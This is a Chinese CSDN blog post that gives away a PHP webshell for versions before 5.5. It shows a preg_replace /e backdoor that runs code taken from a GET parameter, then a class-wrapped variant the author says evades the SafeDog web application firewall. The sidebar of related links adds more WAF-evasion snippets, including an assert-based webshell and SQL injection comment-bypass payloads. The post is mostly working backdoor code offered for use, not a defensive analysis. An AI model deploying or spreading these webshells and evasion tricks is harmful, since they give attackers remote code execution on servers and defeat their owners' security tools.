php5.5过狗

最新推荐文章于 2024-07-09 15:48:59 发布
最新推荐文章于 2024-07-09 15:48:59 发布
阅读量400 收藏
点赞数
分类专栏: hack 文章标签: waf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dome_/article/details/104122230
版权

新年到了,送给大家一个PHP免杀的webshell吧。(仅限PHP5.5以下版本)

 

测试环境

  • PHPstudy8.0.9.2,其中PHP版本为5.2

  • 网站安全狗V4.0正式版

原理

preg_replace函数中使用/e修饰符,造成命令执行。

在PHP5.5以后,/e修饰符被弃用,这种方法就不行了。

<?php$a=$_GET['nb'];preg_replace("/dog/e", $a, "I am a sb dog");?>

在以上代码中,$a中内容会被当做php代码去执行。

 

但是,不幸的是,这样是无法绕过安全狗的。

因此我们需要对上面代码进行混淆,以便绕过安全狗。这里我采用的是自定义类。

<?phpclass SBdog{  public $x;  function dog(){    $this->x=$_GET['nb'];   }}$class=new SBdog();$class->dog();$a=$class->x;preg_replace("/dog/e", $a, "I am a sb dog");?>

通过定义一个SBdog类,并调用dog函数,将类中$x值赋给$a,这样就可以绕过了。

 

 

ps:菜鸡写的文章,有什么错误还请大佬们多多指正。

K'illCode
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
绕安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 298
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
centos 7.4 安装 composer 并下载 laravel5.5
qq_36431213的博客
09-26 1718
composer 的安装 php 5.3以上版本, 并且确定PHP CURL 扩展可用 如果你确定你符合这些要求 那你就可以安装composer啦 安装composer curl -sS https://getcomposer.org/installer | php 将composer设为全局 mv composer.phar /usr/local/bin/composer 给予composer
最新PHP免杀过狗免杀WAF2k大马shell
02-02
最新PHP免杀过狗免杀WAF2k大马shell/仅用于技术研究请勿非法使用
PHP一句话后门过狗姿势万千之理论篇
weixin_30820151的博客
02-03 150
写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面。 但是我只能说,我所传达给大家的信息,是我目前所掌握或者了解的,不能保证所有人都会有收获,但是个人水平有限,可能您觉得文章水平过低,或者并无太大营养。但是跳出文章本身,无论何种技术,重在交流,分享与总结。 另外,希望年轻人不要有太多戾气,更多的是需要保持一个谦逊态度对待技...
什么,有狗快跑!慢着,这次手把手教你怎么过安全狗!(sql注入篇)
最新发布
wananxuexihu的博客
07-09 1036
在记忆里上次绕安全狗还是在上次,开开心心把自己之前绕过狗的payload拿出来,发现全部被拦截了,事情一下子就严肃起来了,这就开整。
php免杀过狗变量覆盖
西米安全
07-05 3364
php免杀过狗变量覆盖 <?php function test($d){ $a='ab'; $ab=$d; echo $$a; $$a($_POST['a']); } test('assert'); ?>
过狗PHP大马
03-03
过狗PHP大马,可以过掉目前安全狗、360等安全软件,亲测可用,并且无视各种杀软
php加刀过狗,打狗棒法之:Cknife(C刀)自定义模式秒过安全狗
weixin_34598113的博客
03-19 195
SKIN=javax.swing.plaf.nimbus.NimbusLookAndFeel设置皮肤为nimbusSPL=->| 表示截取数据的开始符号SPR=|除了修改以上参数过WAF外,程序还额外提供了一种Customize过WAF的模式。Customize模式原本是用于支持一些程序默认不支持的脚...
v2ex-daily:PHP 自动领取 V2EX 每日奖励金币
06-17
PHP >= 5.5 支持 curl_share_init 等函数 使用方式: 实例化一个对象:$v2ex = new v2ex('username', 'password'); 即可。 吐槽: 新浪的 SAE 虽然已经提供了 PHP 5.6 版本,但却不支持 curl_share_* 系列函数,真是...
剖析php大马,WebShell 剖析与变形
weixin_39960147的博客
03-28 819
在测试中经常说到要传马 , 这里的马就是指 WebShell . 一般马被分为小马和大马 , 按功能的强弱划分 . 最常用的 WebShell 就是一句话木马 . 这里从 PHP的WebShell 入手 , 来看一下这些 WebShell 是如何执行 , 如何变形的文章内容可能比较多 , 但是耐心看完后你定会有收获最基本的WebShell结构下面是非常经典的一句话木马其实每个 WebShell 都...
php添加系统服务,PhpStudy系统服务提示启动异常,怎么设置开机自动启动?
weixin_30744613的博客
03-10 780
由于业务需要,搭建了一个Windows镜像的服务器,打算安装PhpStudy这款软件作为PHP运行的环境,但是中途遇到诸多问题,比如:①安装PhpStudy软件缺少VC++2005环境②到官网下载的VC环境解压失败③PhpStudy选择了系统服务但是开机没有自启动本文就把我操作PhpStudy所遇到的问题和解决办法分享给大家,更多的是我的心得。①PhpStudy集成了很多组合环境,光是Php的版本...
PHP Dog-开源
07-01
PHP Dog 是一个用 PHP 编写的进程看门狗。 该程序将能够启动和控制程序的启动和停止。 它允许进程在意外终止时重新启动以保持其程序运行。
2019最新过狗过,云锁,360等WAFPHP免杀大马
02-02
2019最新过狗过,云锁,360等WAFPHP免杀大马等主流防护软件
PhpWatchDog-开源
05-02
PhpWatchDog是一个用PHP编写的网络监视器应用程序。 这是检查服务(HTTP,FTP,SSH等)是否正在运行的简单方法。 PhpWatchDog可以将电子邮件发送给服务器的管理员,以提醒有关故障的信息。
一句话木马 php 过狗,如何自己写aspx过狗D盾一句话木马
weixin_39524882的博客
03-18 324
hi,我是凉风,(以下内容纯属个人见解,如有不同的意见欢迎回复指出) ,本菜比发现aspx过狗的姿势不常见,不像php一样一抓一大把,于是我决定研究一下aspx引用i春秋作家团大佬一句话木马的意思就是,我们制造了一个包含远程代码执行漏洞的web页面。目录:0×01:我没有aspx代码编写基础,我该从哪入手?0×02:正式开始:从过狗菜刀配置文件里寻找思路0×03:再写一个:分析各种拦截机制,一一绕...
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 5069
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
SQL注入绕过安全狗
blackguest07的博客
01-12 2408
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值